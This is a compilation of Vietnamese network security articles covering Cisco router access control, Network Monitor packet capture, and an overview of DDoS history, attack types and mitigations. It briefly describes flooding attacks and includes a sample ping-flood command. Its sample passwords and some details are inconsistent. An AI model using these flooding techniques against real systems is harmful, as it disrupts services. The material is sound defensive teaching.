Người dùng nên có một sự hợp tác với hệ thống bảo mật, ít nhất ở mức độ nào đó.Password, chẳng hạn, có thể nhận được bằng cách đơn giản gọi điên đến người dùng, giả làm người quản trị. Nếu người dùng của bạn hiểu những vấn đề bảo mật và nếu họ hiểu lý do những biện pháp của bạn, họ sẽ không khiến cho kẻ xâm nhập cảm thấy dễ dàng. Ít nhất, người dùng nên được hướng dẫn không bao giờ đưa password hay thông tin bí mật qua đường điện thoại hay email không được bảo vệ, cảnh giác với những câu hỏi qua điện thoại. Một vài công ty đã lập ra những chương trình đào tạo về bảo mật thông thường cho nhân viên, nhân viên không được truy cập Internet khi chưa hoàn thành chương trình này.
Biết điểm yếu của bạn
Mọi hệ thống đều có điểm yếu. Bạn cần hiểu các điểm yếu trong hệ thống của bạn và cách khai thác những điểm yếu đó. Bạn cũng nên biết khu vực có nguy cơ cao nhất và ngăn chặn sự truy cập đến đó. Hiểu được những điểm yếu là bước đầu tiên đưa chúng thành những khu vực an toàn.
Giới hạn phạm vi truy cập
Bạn nên đặt những giới hạn thích hợp trong hệ thống sao cho nếu kẻ xâm nhập có thể truy cập đến một phần hệ thống, họ không thể tự động có quyền truy cập đến phần còn lại của hệ thống.
Hiểu môi trường làm việc của bạn
Hiểu hệ thông của bạn hoạt động ra sao, biết được cái gì được mong đợi và cái gì không, quen với việc các thiết bị thường được sử dụng thế nào, sẽ giúp bạn phát hiện những vấn đề bảo mật. Chú ý đến những sự kiện không bình thường giúp bạn phát hiện kẻ xâm nhập trước khi chúng phá hoại hệ thống. Những công cụ giám sát có thể giúp bạn phát hiện những sự kiện không bình thường đó.
Giới hạn sự tin tưởng
Bạn nên biết chính xác bạn phần mềm nào bạn tin tưởng, và hệ thống bảo mật của bạn không nên dựa trên giả định rằng tất cả các phần mềm không có lỗi
Nhớ đến physical security
Truy cập một cách trực tiếp vào 1 máy tính ( hay một router ), một người kinh nghiệm có thể chiếm toàn bộ điều khiển trên đó.Sẽ chẳng có ý nghĩa gì nếu cài đặt những phần mềm bảo mật khi quyền sử dụng trực tiếp phần cứng không được quan tâm.
Bảo mật ở khắp nơi
Hầu hết những thay đổi trong hệ thống của bạn có thể có ảnh hưởng đến bảo mật. Điều này đặc biệt đúng khi một dịch vụ mới được tạo ra. Những nhà quản trị, lập trình, và người dùng phải luôn để ý đến vấn đề bảo mật trong mỗi thay đổi họ tạo ra. Hiểu được khía cạnh bảo mật của mỗi thay đổi đòi hỏi thực hành, khám phá mỗi dịch vụ có thể được sử dụng theo những cách nào.
Điều khiển truy cập tới Cisco Routers
Việc điều khiển truy cập tới Cisco routers của bạn là rất quan trọng. Bạn có thể điều khiển truy cập tới routers sử dụng các phương pháp sau :
- Truy cập console
- Truy cập telnet
- Truy cập bằng Simple Network Management Protocol (SNMP)
- Điều khiển truy cập tới servers có những file cấu hình hệ thống
Bạn có thể bảo vệ 3 phương pháp đầu tiên bằng cách sử dụng tính năng của phần mềm router. Với mỗi phương pháp, bạn có thể cho phép privileged access (truy cập với đặc quyền ) hay nonprivileged access (truy cập thông thường) đối với mỗi người dùng (hay nhóm người dùng). Nonprivileged access cho phép người dùng theo dõi router nhưng không được thay đổi router. Privileged access cho người dùng toàn quyền thay đổi cấu hìnhcho router. Với truy cập qua console port và Telnet, bạn có thể thiết lập 2 loại password. Loại thứ nhất là password đăng nhập, cho phép nonprivileged access. Sau khi truy cập vào router, người dùng có thể chuyển sang chế độ privileged bằng cách nhập password phù hợp. Ở chế độ privileged người dùng có toàn quyền thay đổi thiết lập
Truy cập SNMP cho phép bạn đặt những chuỗi SNMP khác nhau cho cả nonprivileged và privileged access.
Nonprivileged access cho phép người dùng ở 1 host gửi đến router những thông điệp SNMP get-request và SNMP get-next-request. Những thông điệp này được dùng để lấy thông tin từ router. Privileged access cho phép người dùng gửi những thông điệp SNMP set-request để thay đổi cấu hìnhvà trạng thái hoạt động của router.
Truy cập Console
Console là thiết bị đầu cuối gắn trực tiếp với router qua cổng console. Việc bảo mật được áp dụng với console bằng cách buộc người dùng xác nhận bản thân qua password. Theo mặc định, không có password đi kèm với console access.
Password cho chế độ nonprivileged
Bạn thiết lập password cho chế độ nonprivileged bằng cách đánh dòng lệnh sau vào file cấu hìnhcủa router.
Password phân biệt chữ hoa, chữ thường. Ở ví dụ, password là "1forAll" line console 0
login password 1forAll
Khi bạn đăng nhập vào router, sẽ nhận được thông báo login như sau
User Access Verification
Password:
Bạn phải nhập password "1forAll" để có quyền nonprivileged access đến router. Router sẽ trả lời như sau :
router>Dấu nhắc > báo hiệu đây là chế độ nonprivileged. Bây giờ bạn có thể dùng rất nhiều lệnh để xem thông tin về hoạt động của router. Không bao giờ dùng "cisco", hay những biến thể khác như "pancho" cho password của Cisco router. Đó sẽ là những password đầu tiên kẻ xâm nhập thử khi họ nhìn thấy dấu đăng nhập Cisco.
Password cho chế độ privileged
Thiết lập password cho chế độ privileged bằng cách đưa dòng lệnh sau vào file cấu hìnhcủa router. Trong ví dụ này password là "san-tran". enable-password san-fran
Để truy cập chế độ privileged, đánh lệnh sau:
router> enable
Password:
Gõ password "san-fran" để được privileged access tới router. Router trả lời như sau :
router#
Dấu nhắc # báo hiệu chế độ privileged. Ở chế độ privileged, bạn có thể đánh tất cả các lệnh để xem thông tin và cấu hìnhcho router.
Giới hạn thời gian phiên làm việc
Đặt password đăng nhập và password enable có thể chưa đủ an toàn trong 1 số trường hợp. Giới hạn thời gian cho một console không được điều khiển ( mặc định 10 phút ) cung cấp thêm một biện pháp an toàn.Bạn có thể thay đổi giới hạn này bằng lệnh exec-timeout mm ss trong đó mm là số phút, ss là số giây. Lệnh sau thay đổi giới hạn thành 1 phut 30 giây line console 0 exec-timeout 1 30
Mã hóa password
Tất cả password trên router đều có thể xem được bằng lệnh xem cấu hìnhcủa router trong chế độ privileged.
Nếu bạn có quyền truy cập ở chế độ privileged , bạn có thể xem tất cả password ở dạng cleartext, theo mặc định. Có một cách để giấu cleartext password. Lệnh password-encryption lưu các password dưới dạng mã hóa.Tuy nhiên, nếu bạn quên password, để lấy lại quyền truy cập, bạn phải có quyền truy cập trực tiếp (physical access) đối với router.
Truy cập bằng Telnet
Bạn có thể truy cập theo chế độ nonprivileged hoặc privileged tới router thông qua Telnet. Giống như với Console, sự bảo mật với Telnet có được khi người dùng xác nhận bản thân bằng password. Thực tế, rất nhiều khái niệm tương tự mô tả ở phần "Console Access" ở trên cũng áp dụng cho truy cập Telnet.
Bạn phải nhập password để chuyển từ chế độ nonprivileged sang privileged, có thể mã hóa password, đặt giới hạn thời gian cho phiên làm việc.
Password cho chế độ nonprivileged
Mỗi cổng Telnet của router được coi như một thiệt bị đầu cuối "ảo" ( virtual terminal ). Có tối đa 5 cổng dành cho virtual terminal (VTY) trên router , cho phép 5 phiên làm việc Telnet đồng thời. Trên router, các này đánh số từ 0 đến 4. Bạn có thể đặt nonprivileged password cho các cổng với lệnh cấu hình sau.Trong ví dụ này, cổng virtual terminal từ 0 đến 4 sử dụng password "marin" :
line vty 0 4
login
password marin
Khi người dùng telnet đến IP của router, router trả lời tương tự như sau :
% telnet router
Trying ...
Connected to router
Escape character is '^]'
User Access Verification
Password:
Nếu người dùng nhập đúng nonprivileged password, dấu nhắc sau sẽ xuất hiện:
router>
Password cho chế độ privileged
Bây giờ người dùng đã có nonprivileged access và có thể chuyển sang chế độ privileged bằng cách gõ lệnh enable giống như đối với Console Access.
Hạn chế truy cập Telnet đối với những địa chỉ IP cụ thể
Nếu bạn muốn chỉ những IP nhất định có thể dùng Telnet truy cập router, bạn phải dùng lệnh access-class nn in để xác định danh sách truy cập (từ 1 đến 99). Lệnh cấu hình sau cho phép truy cập Telnet đến router từ các host trong mạng 192.85.55.0:
access-list 12 permit 192.85.55.0 0.0.0.255
line vty 0 4
access-class 12 in
Hạn chế truy cập Telnet đối với các sản phẩm Cisco thông qua cổng TCP
Có thể truy cập tới 1 sản phẩm của Cisco thông qua Telnet đến những cổng TCP nhất định. Kiểu truy cập
Telnet thay đổi tùy theo những phiên bản phần mềm Cisco:
- Software Release 9.1 (11.4) và cũ hơn, 9.21 (3.1) và cũ hơn
- Software Release 9.1 (11.5) , 9.21 (3.2), 10.0 và mới hơn
Với Software Release 9.1 (11.4) và cũ hơn, 9.21 (3.1) và cũ hơn, có thể , theo mặc định, thiết lập kết nối TCP
tới sản phẩm của Cisco thông qua các cổng TCP trong Bảng 3-1
Bảng 3-1 : Cổng TCP truy cập Telnet tới các sản phẩm Cisco ( các phiên bản cũ)
Cổng TCP Phương thức truy cập
7 Echo
9 Discard
23 Telnet ( tới cổng VTY theo kiểu quay vòng)
79 Finger
1993 SNMP thông qua TCP
2001-2999 Telnet tới cổng hỗ trợ (auxiliary - AUX ), cổng terminal (TTY), và cổng virtual terminal (VTY)
3001-3999 Telnet tới những cổng quay vòng ( chỉ có thể khi đã được cấu hình với lệnh rotary )
4001-4999 Telnet ( stream mode ) , mirror của các cổng trong khoảng 2000
5001-5999 Telnet ( stream mode), mirror của khoảng 3000 ( chỉ khi đã cấu hình rotary)
6001-6999 Telnet (binary mode), mirror của khoảng 2000
7001-7999 Telnet (binary mode), mirror của khoảng 300 ( chỉ khi đã cấu hình rotary)
8001-8999 Xremote ( chỉ với communication servers)
9001-9999 Reverse Xremote ( chỉ với communication servers)
10001-19999 Reverse Xremote rotary (chỉ với communication servers, khi đã cấu hình rotary trước)
Chú ý : Vì Cisco routers không có đường TTY, thiết lập truy cập ( trên communicaiton servers) tới các cổng 2002,2003,2004 và lớn hơn có thể cung cấp truy cập tới VTY (trên routers) tới các cổng tương ứng. Để cung cấp truy cập tới các cổng TTY, bạn có thể tạo danh sách truy cập trong đó hạn chế truy cập đối với VTYs.
Khi thiết lập những nhóm quay vòng, luôn nhớ rằng có thể truy cập đến bất cứ cổng nào trong nhóm (trừ khi có danh sách giới hạn truy cập).
Sau đây là ví dụ minh họa một danh sách truy cập từ chối truy cập đến cổng hỗ trợ (AUX) và chỉ cho phép truy cập
telnet từ địa chỉ 192.32.6.7 :
access-class 51 deny 0.0.0.0 255.255.255.255
access-class 52 permit 192.32.6.7
line aux 0
access-class 51 in
line vty 0 4
Chú ý : nếu lệnh ip alias được cho phép trên sản phẩm Cisco, mọi kết nối TCP tới bất cứ cổng nào cũng được coi là hợp lệ. Có thể bạn sẽ muốn vô hiệu hóa lệnh này
Có thể bạn muốn tạo danh sách truy cập hạn chế truy cập tới sản phẩm Cisco qua cổng TCP. đến router.
Với Software Release 9.1 (11.5), 9.21 (3.2), và bất cứ phiên bản nào của Software Release 10, những cải tiến sau đã được thực hiện :
- Truy cập trực tiếp đến virtual terminal lines (VTYs) qua cổng trong các khoảng 2000,4000 và 6000 đã được vô hiệu hóa theo mặc định
- Kết nối tới cổng echo và discard (7 và 9) có thể được vô hiệu hóa với lệnh no service tcp-small-servers
- Tất cả sản phẩm Cisco cho phép kết nối tới IP alias chỉ với cổng 23
Với những phiên bản sau này, Cisco router chấp nhận kết nối TCP qua các cổng mặc định trong Bảng 3-2
Bảng 3-2 : Cổng TCP cho truy cập Telnet tới các sản phẩm Cisco ( những phiên bản sau )
Cổng TCP Phương thức truy cập
7 Echo
9 Discard
23 Telnet
79 Finger
1993 Cổng hỗ trợ (AUX)
4001 Cổng AUX (stream)
6001 Cổng AUX (binary)
Truy cập qua cổng 23 có thể bị hạn chế bằng cách tạo danh sách truy cập và gán nó cho một đường virtual terminal.
Truy cập qua cổng 79 có thể vô hiệu hóa bằng lệnh no service finger. Truy cập qua cổng 1993 có thể được kiểm soát bằng danh sách truy cập SNMP. Truy cập qua cổng 2001,4001 và 6001 có thể được kiểm soát bằng 1 danh sách truy cập đặt ở 1 cổng hỗ trợ (AUX)
Terminal Access Conroller Access Control System ( TACACS)
Password chế độ nonprivileged và privileged được áp dụng cho mỗi người dùng truy cập router từ console port hay Telnet. Ngoài ra, Terminal Access Controller Access Control System (TACACS) cung cấp 1 cách xác nhận mỗi người dùng dựa trên từng cơ sở riêng biệt trước khi họ có thể có quyền truy cập vào router hay communication
server. TACACS được xây dựng ở Bộ quốc phòng mỹ và được mô tả trong Request For Comments (RFC) 1492.
TACACS được Cisco sử dụng để cho phép quản lý tốt hơn, xem ai có quyền truy cập tới router trong chế độ nonprivileged và privileged .
Với TACACS enabled, router nhắc người dùng nhập username và password. Sau đó, router gọi TACACS server để xác định password có đúng không. Một TACACS server thường chạy trên một trạm làm việc UNIX. Domain TACACS servers có thể nhận được thông qua anonymous ftp đến ftp.cisco.com trong thư mục /pub. Sử dụng /pub/README để tim tên file. Một server hỗ trợ TACACS đầy đủ có kèm trong CiscoWorks Version 3.
Lệnh cấu hình tacacs-server host xác định UNIX host chạy một TACACS server sẽ xác nhận lại yêu cầu gửi từ routers.
Bạn có thể đánh lệnh tacacs-server host nhiều lần để chỉ ra nhiều TACACS server cho một router.
Nonprivileged Access
Nếu tất cả server đều không sẵn sàng, bạn có thể bị khóa đối với router. Lúc này, lệnh cấu hình tacacs-server last resort [password | succeed] cho phép bạn xác định xem có cho người dùng đăng nhập không cần password
( từ khóa succeed) hay buộc người dùng cung cấp password chuẩn ( từ khóa password)
Các lệnh sau chỉ ra một TACACS server và cho phép đăng nhập nếu server gặp sự cố:
tacacs-server host 129.140.1.1
tacacs-server last-resort succeed
Buộc người dùng truy cập qua Telnet xác nhận bản thân qua lệnh cấu hìnhsau :
line vty 0 4
login tacacs
Privileged Access (truy cập với đặc quyền)
Phương pháp kiểm tra password này cũng có thể áp dụng với chế độ privileged dùng lệnh enable use-tacacs.
Nếu tất cả server đều không sẵn sàng tiếp nhận, lệnh cấu hìnhenable last-resort [succeed | password] cho biết có để người dùng đăng nhập không cần password hay không. Nếu bạn dùng lệnh enable use-tacacs, bạn cũng phải dùng lệnh tacacs-server authenticate enable. Lệnh tacacs-server extended cho phép thiết bị Cisco chạy chế độ TACACS mở rộng. Hệ thống UNIX phải chạy extended TACACS daemon, có thể nhận được bằng anonymous ftp tới ftp.cisco.com, tên file là xtacacsd.shar. Daemon này cho phép communication servers và những thiết bị khác giao tiếp với hệ thống UNIX và cập nhật thông tin mà thiết bị đó gửi.
Lệnh username <user> password [0 | 7] <password> cho phép bạn lưu một danh sách user và password trong thiết bị Cisco thay vì trên một TACACS server. Số 0 lưu password dạng cleartext trong file cấu hình. Số 7 lưu ở dạng mã hóa. Nếu bạn không có một TACACS server và vẫn muốn xác định từng user bạn có thể dùng những
lệnh cấu hìnhsau :
username steve password 7 steve-pass
username allan password 7 allan-pass
Token Card Access ( truy cập bằng thẻ )
Sử dụng TACACS cho routers và communication server, có thể hỗ trợ các loại key devices , hay token card.
Mã của TACACS server có thể thay đổi để hỗ trợ việc này mà không cần thay đổi cấu hình của router hay communication server. Sự thay đổi này không thể trực tiếp từ Cisco
Hệ thống token card dựa trên một tấm thẻ bạn phải có để xác nhận bản thân. Bằng cách móc nối ( hook ) với mã của TACACS server, các công ty thứ 3 ( third-party) có thể cung cấp những dịch vụ này. Một trong những sản phẩm như vậy là Enigma Logic SafeWord, ngoài ra còn có Security Dynamics SmartCard.
|
|
|
|
Tác giả: (Someone) HVA-Translator group???
Tăng cường bảo mật cho mạng IP
Tăng cường bảo mật cho mạng IP
Tìm hiểu cách tiếp cận của Cisco với vấn đề bảo mật mạng
Điều khiển truy cập tới Cisco Routers
Truy cập Console
Password cho chế độ nonprivileged ( bình thường )
Password cho chế độ privileged ( đặc quyền )
Giới hạn thời gian phiên làm việc
Mã hóa password
Truy cập Telnet
Password cho chế độ nonprivileged
Password cho chế độ privileged
Hạn chế truy cập Telnet với những địa chỉ IP cụ thể
Hạn chê truy cập Telnet với những sản phẩm của Cisco thông qua các cổng TCP
Terminal Access Controller Access Control System (TACACS)
Chế độ nonprivileged
Chế độ privileged
Simple Network Management Protocol ( SNMP)
Chế độ nonprivileged
Chế độ privileged
Thiết lập kiến trúc cho một firewall
Điều khiển lưu thông trong mạng
Cấu hình cho một Firewall Router
Lập danh sách truy cập
Áp dụng danh sách truy cập với các interface
Cấu hình cho một Firewall Communication Server
Lập danh sách truy cập
Áp dụng danh sách truy cập với các interface
Sử dụng banner tạo các thông báo
Bảo vệ những dịch vụ ngoài chuẩn khác
Tổng kết
Danh sách tài liệu nên đọc
|
|
|
|
Tác giả: (Someone)
Đối với một quản trị mạng, một thao tác vô cùng quan trọng là kiểm soát được các traffic chạy trên mạng của mình. Tuy nhiên do số gói tin trên mạng là rất lớn cho nên hầu như là không thể theo dõi được hết nội dung từng gói. Quản trị mạng có thể chỉ cần giám sát được các loại protocol khác nhau đang gửi nhận gói tin trên mạng. Việc giám sát mạng cho ta biết được bandwidth được sử dụng bởi những ứng dụng nào.
Đồng thời ta biết được người dùng trong mạng có dùng các phần mềm chia sẻ file hay một loại Trojan nào đó ngấm ngầm gửi các thông tin bất hợp lệ trên mạng. Việc giám sát mạng này không hề phức tạp như nhiều người nghĩ, Microsoft đã cung cấp sẵn một công cụ cho phép giám sát mạng khá hiệu quả trên Windows đó là phần mềm Network Monitor. Bài viết này sẽ hướng dẫn cách dùng Network monitor như một công cụ giám sát băng thông mạng.
Có 2 phiên bản của công cụ Network Monitor đi kèm với các sản phẩm của Microsoft. Bản thu gọn nằm trong bộ Microsoft Windows 2003 chỉ cho phép phân tích các gói tin đi vào và đi ra server chạy Windows 2003 server.Bản đầy đủ được đi kèm trong SMS Server, cho phép giám sát traffic từ bất kỳ máy nào trong mạng để biết được người dùng nào đang sử dụng băng thông nhiều nhất. Bản đầy đủ còn cho phép xác định xem người dùng nào chiếm băng thông mạng nhiều nhất, định vị các router trong mạng, và phân giải tên thiết bị ra địa chỉ MAC.
Một chức năng đã được lược bớt khi triển khai bộ công cụ Network Monitor cho Windows 2003 server so với bản đầy đủ của SMS server là khả năng bắt gói, thay đổi nội dung và truyền lại gói tin lên mạng. Nguyên nhân là do chức năng này có thể được hacker sử dụng để thực hiện các cuộc tấn công replay attack. Trong kỹ thuật tấn công này, hacker tìm cách bắt giữ một số thông tin quan trọng trong mạng (ví dụ các gói tin chứng thực).Sau đó, để có thể log vào với danh nghĩa một người dùng khác, hacker thay đổi nội dung gói để đánh tráo địa chỉ nguồn và đích rồi truyền lại gói tin.
Cài đặt Network Monitor
Chương trình Setup của Windows không cài đặt Network Monitor một cách mặc định. Vì vậy để cài đặt Network Monitor ta vào Control Panel click nút Add / Remove Windows Components để chạy Windows Components wizard. Duyệt qua danh sách các thành phần cho đến khi định vị ra được lựa chọn về Management và Monitoring Tools, chọn công cụ Management and Monitoring và click chọn Details.Chọn Network Monitor Tools, rồi click Next.Windows sẽ bắt đầu quá trình cài đặt, trong quá trình cài, có thể bạn sẽ được yêu cầu đút đĩa CD vào máy. Sau khi cài đặt xong, click nút Finish.
Khởi động Network Monitor
Sau khi cài đặt xong công cụ Network Monitor, có thể kích hoạt nó trong bộ công cụ Administrative Tools của Windows. Ban đầu, khi Network Monitor mới được tải ra, sẽ có một hộp thoại cho người sử dụng lựa chọn mạng để capture gói data trên đó. Click OK, hộp thoại Select a Network hiện ra. Một cách đơn giản nhất là mở rộng cây thư mục My Computer và chọn card mạng cần được giám sát. Click OK để tiếp tục.
Giao diện chính của phần mềm Network Monitor
Tại thời điểm ban đầu, giao diện của chương trình chưa có gì cả bởi vì tiến trình bắt gói dữ liệu chưa bắt đầu. Người dùng là có quyền điều khiển toàn bộ tiến trình này, tuy nhiên tốt nhất trước khi bắt đầu, nên thiết lập một bộ lọc cho tiến trình bắt gói. Bộ lọc này định ra những loại gói tin cụ thể được bắt và hiển thị lên màn hình của Network Monitor, tránh trường hợp bắt giữ quá nhiều gói tin làm người dùng không kịp phân tích. Có hai loại bộ lọc trong chương trình: bộ lọc bắt gói và bộ lọc hiển thị.
Bộ lọc bắt gói cho phép định ra các gói được bắt để phân tích. Ví dụ: có thể điều chỉnh để chương trình chỉ bắt gói HTTP.
Bộ lọc hiển thị làm việc tương tự ngoại trừ việc tất cả các gói tin trên mạng đều bị bắt giữ, nó thực hiện lọc các dữ liệu cần phân tích tại thời điểm phân tích chứ không phải tại thời điểm bắt gói. Bộ lọc hiển thị sử dụng nhiều không gian đĩa cứng hơn bộ lọc bắt gói nhưng thông tin được phân tích phong phú hơn.
Bắt gói
Để cấu hình bộ lọc, chọn Filter trong menu Capture. Nếu không có thể bắt đầu quá trình bắt gói bằng cách click vào lệnh Start trên menu Capture. Tiến trình bắt gói sẽ được hiển thị như trong hình vẽ.Khi đã bắt được gói cần thiết để phân tích, nên dừng tiến trình lại bằng nút Stop
Đây là tiến trình bắt gói của Network Monitor
Phân tích dữ liệu
Để phân thích dữ liệu, chọn lệnh Display Captured Data từ menu Capture, màn hình sẽ hiện ra như sau:
Hình trên là danh sách tất cả các gói tin được bắt theo đúng thứ tự. Dữ liệu trong hình trên là dữ liệu chưa được lọc nên thông tin hiển thị ra là rất nhiều, có thể cấu hình bộ lọc để giảm bớt lượng thông tin này: chọn lệnh Filter trong menu Display.
Người dùng duyệt trong cửa sổ để xem các gói tin, khi tìm được gói tin cần phần tích, kích đúp vào để xem nội dung chi tiết của gói tin, hình dưới đây là một ví dụ:
Trong màn hình hiển thị, nội dung gói được chia ra làm 3 phần. Phần trên cùng hiển thị nội dung vắn tắt. Người dùng có thể nhanh chóng tìm và chọn ra được gói tin cần phân tích trong phần cửa sổ này.
Phần thứ 2 là nội dung gói tin sau khi đã được giải mã và được hiển thị dưới dạng cây phân cấp. Trong hình trên, phần gốc cây có tiêu đề FRAME: Base Frame Properties. Nếu mở rộng phần đó, có thể thấy các thông tin cụ thể như thời gian, ngày tháng mà frame được lưu giữ, số frame, và độ dài frame.
Phần thứ 3 hiển thị nội dung dữ liệu thô tạo nên gói tin. Trong phần này, cột ngoài cùng phía trái hiển thị địa chỉ cơ sở của các byte trên 1 dòng dữ liệu dưới dạng các số hexa. Để xác định vị trí của các ký tự hexa, cộng giá trị địa chỉ cơ sở với vị trí cột của ký tự hexa muốn định vị. Ví dụ: địa chỉ cơ sở là 00000010 và ký tự cần xác định địa chỉ chính xác ở cột thứ 12 thì giá trị địa chỉ sẽ là 0000001B (0000001B = 00000010 + 0000000B).
Cột ngoài cùng phía bên phải chứa các thông tin được hiển thị lại dưới dạng decimal.Mọi thông tin được hiển thị dứơi dạng văn bản thông thường và dễ đọc hơn. Ví dụ một e-mail được truyền không mã hóa bị Network Monitor bắt, khi đó, có thể xem được nội dung đầy đủ của thông điệp (tất nhiên trước đó người dùng phải định vị chính xác gói tin chứa thông điệp email trong hàng loạt gói mà Network Monitor bắt được). Trong hình là một gói tin LDAP yêu cầu dịch vụ Active Directory.
Bằng việc sử dụng Network Monitor được tích hợp sẵn trong Microsoft Windows các quản trị mạng có thể dễ dàng theo dõi nhiều traffic khác theo hướng ra và hướng vào một server.
Tác giả: (Someone)
|
|
|
|
Tác giả: (Someone)
DDOS - Distributed Denial Of Service ?
• 1998 Chương trình Trinoo Distributed Denial of Service (DDoS) được viết bởi Phifli.
• Tháng 5 – 1999 Trang chủ của FBI đã ngừng họat động vì cuộc tấn công bằng (DDOS)
• Tháng 6 – 1999 Mạng Trinoo đã được cài đặt và kiểm tra trên hơn 2000 hệ thống.
DDOS – Distributed Denial Of Service ?
• Cuối tháng 8 đầu tháng 9 năm 1999, Tribal Flood Network đầu tiiên ra đời, Chương trình được Mixter Phát triển.
• Cuối tháng 9 năm 1999, Công cụ Stacheldraht đã bắt đầu xuất hiện trên những hệ thống của Châu âu và Hoa kỳ.
• Ngày 21 tháng 10 năm 1999 David Dittrich thuộc trường đại học Washington đã làm những phân tích về công cụ tấn công từ chối dịch vụ
•
DDOS - Distributed Denial Of Service ?
• Ngày 21 tháng 12 năm 1999 Mixter phát hành Tribe Flood Network 2000 ( TFN2K ).
• 10 : 30 / 7 – 2 -2000 Yahoo! ( Một trung tâm nổi tiếng ) đã bị tấn công từ chối dịch vụ và ngưng trệ hoạt động trong vòng 3 giờ đồng hồ. Web site Mail Yahoo và GeoCities đã bị tấn công từ 50 địa chỉ IP khác nhau với nhửng yêu cầu chuyễn vận lên đến 1 gigabit /s.
DDOS - Distributed Denial Of Service ?
• 8 -2 nhiều Web site lớn như Buy.com, Amazon.com, eBay, Datek, MSN, và CNN.com bị tấn công từ chối dịch vụ.
• Lúc 7 giờ tối ngày 9-2/2000 Website Excite.com là cái đích của một vụ tấn công từ chối dịch vụ, dữ liệu được luân chuyễn tới tấp trong vòng 1 giờ cho đến khi kết thúc, và gói dữ liệu đó đã hư hỏng nặng.
DDOS - Distributed Denial Of Service?
• Qua đó ta có thể thấy rõ những vụ tấn công từ chối dịch vụ (Denial Of Services Attack ) và những cuộc tấn công về việc gửi nhửng gói dữ liệu tới máy chủ (Flood Data Of Services Attack) tới tấp là những mối lo sợ cho nhiều mạng máy tính lớn và nhỏ hiện nay,
DDOS - Distributed Denial Of Service?
• Khi một mạng máy tính bị Hacker tấn công nó sẽ chiếm một lượng lớn tài nguyên trên server như dung lượng ổ cứng, bộ nhớ, CPU, băng thông …. Lượng tài nguyên này tùy thuộc vào khả năng huy động tấn công của mỗi Hacker. Khi đó Server sẽ không thể đáp ứng hết những yêu cầu từ những client của những người sử dụng và từ đó server có thể sẽ nhanh chóng bị ngừng hoạt động, crash hoặc reboot.
•
DDOS - Distributed Denial Of Service?
• Tấn công từ chối dịch vụ có rất nhiều dạng như Ping of Death, Teardrop, Aland Attack, Winnuke, Smurf Attack, UDP/ICMP Flooding, TCP/SYN Flooding, Attack DNS.
DDOS - Distributed Denial Of Service?
• Ping Of Death.
Một số máy tính sẽ bị ngưng họat động, Reboot hoặc bị crash khi bị nhận những gói dữ liệu ping có kích thước lớn.
• Ví dụ như : ping địachỉ -n 1000
trong đó : số 1000 là số lần gửi gói dữ liệu.
• TCP/SYN Flooding:
Bước 1: Khách hàng gửi một TCP SYN packet đến cổng dịch vụ của máy chủ
Khách hàng =è SYN Packet ===è Máy chủ
DDOS - Distributed Denial Of Service?
• Bước 2 : Máy chủ sẽ phản hồi lại khách hàng bằng 1 SYN/ACK Packet và chờ nhận một 1 ACK packet từ khách hàng
Máy chủ è SYN/ACK Packet è Khách hàng
• Bước 3: Khách hàng phản hồi lại Máy chủ bằng một ACK Packet và việc kết nối hòan tất Khách hàng và máy chủ thực hiện công việc trao đổi dữ liệu với nhau.
Khách hàng è ACK Packet è Máy chủ
DDOS - Distributed Denial Of Service?
• Trong trường hợp Hacker thực hiện việc SYN Flooding bằng cách gửi tới tấp, hàng loạt TCP SYN packet đến cổng dịch vụ của máy chủ sẽ làm máy chủ bị quá tải và không còn khả năng đáp ứng được nữa.
DDOS - Distributed Denial Of Service?
• UDP/ICMP Flooding:
Hacker thực hiện bằng cách gửi 1 số lượng lớn các gói tin UDP/ICMP có kích thước lớn đến hệ thống mạng, khi hệ thống mạng chịu phải sự tấn công này sẽ bị qua tải và chiếm hết băng thông đường truyền đi ra bên ngòai của mạng này, vì thế nó gây ra nhửng ảnh hưởng rất lớn đến đường truyền cũng như tốc độ của mạng, gây nên những khó khăn cho khách hàng khi truy cập từ bên ngoài vào mạng này.
DDOS - Distributed Denial Of Service?
• Những điều kiện đủ để có những cuộc tấn công DoS Có hiệu quả:
Để có được những cuộc tấn công DOS có hiệu quả thông thường một Hacker phải lựa chọn cho mình những đường truyền có dung lượng lớn cũng như tốc độ máy được dùng làm công cụ tấn công. Nếu không hội tụ được những điều kiện trên thì cuộc tấn công sẽ không mang lại mấy khả quan.
DDOS - Distributed Denial Of Service?
• Nhưng với những tiện ích như Trinoo, TFN2K, Stacheldraht… người tấn công không phải chỉ dùng 1 nơi để tấn công mà sử dụng nhiều mạng lưới khác nhau để thực hiện việc tấn công đồng lọat. Các máy được dùng để tấn công thường là các máy có kết nối Internet bị người tấn công xâm nhập.
DDOS - Distributed Denial Of Service?
• Qua đó chúng tôi đã tham khảo và biết một số cách nhưng hầu hết không chống được một cách triệt để.
1> Khi bạn phát hiện máy chủ mình bị tấn công hãy nhanh chóng truy tìm địa chỉ IP đó và cấm không cho gửi dữ liệu đến máy chủ.
2> Dùng tính năng lọc dữ liệu của router/firewall để loại bỏ các packet không mong muốn, giảm lượng lưu thông trên mạng và tải của máy chủ.
DDOS - Distributed Denial Of Service?
• 3> Sử dụng các tính năng cho phép đặt rate limit trên router/firewall để hạn chế số lượng packet vào hệ thống.
• 4> Nếu bị tấn công do lỗi của phần mềm hay thiết bị thì nhanh chóng cập nhật các bản sửa lỗi cho hệ thống đó hoặc thay thế.
• 5> Dùng một số cơ chế, công cụ, phần mềm để chống lại TCP SYN Flooding.
DDOS - Distributed Denial Of Service?
• 6> Tắt các dịch vụ khác nếu có trên máy chủ để giảm tải và có thể đáp ứng tốt hơn. Nếu được có thể nâng cấp các thiết bị phần cứng để nâng cao khả năng đáp ứng của hệ thống hay sử dụng thêm các máy chủ cùng tính năng khác để phân chia tải.
• 7> Tạm thời chuyển máy chủ sang một địa chỉ khác.
Flooding Data Attack ?
• Hoàn toàn khác với DDos về khả năng tấn công cũng như sự huy động tấn công rất dễ dàng để làm tràn ngập dữ liệu (Flood data attack !) được phát triển ở rất nhiều dạng nó dựa vào những lỗi của hầu hết các mã nguồn mở của ASP, PHP, JSP, CGI …..
Flooding Data Attack ?
• Với DDOS như chúng ta đã biết khi một số Hacker muốn mở những cuộc tấn công đều phải hội tụ những điều kiện, là phải dùng những máy chủ có đường truyền cao và thường thì phải Hack vào server đó mới có thể huy động làm công cụ tấn công được, ngược lại với Flood data attack việc huy động quá dễ, nó chia ra làm 2 dạng tấn công như sau:
Flooding Data Attack ?
• Dạng 1: Được chạy trên trên môi trường Windonw, Unix, Linux …
• Dạng 2: Được đính kèm trên các Website và nhận lệnh tấn công từ một địa chỉ nào đó trên Mạng toàn cầu.
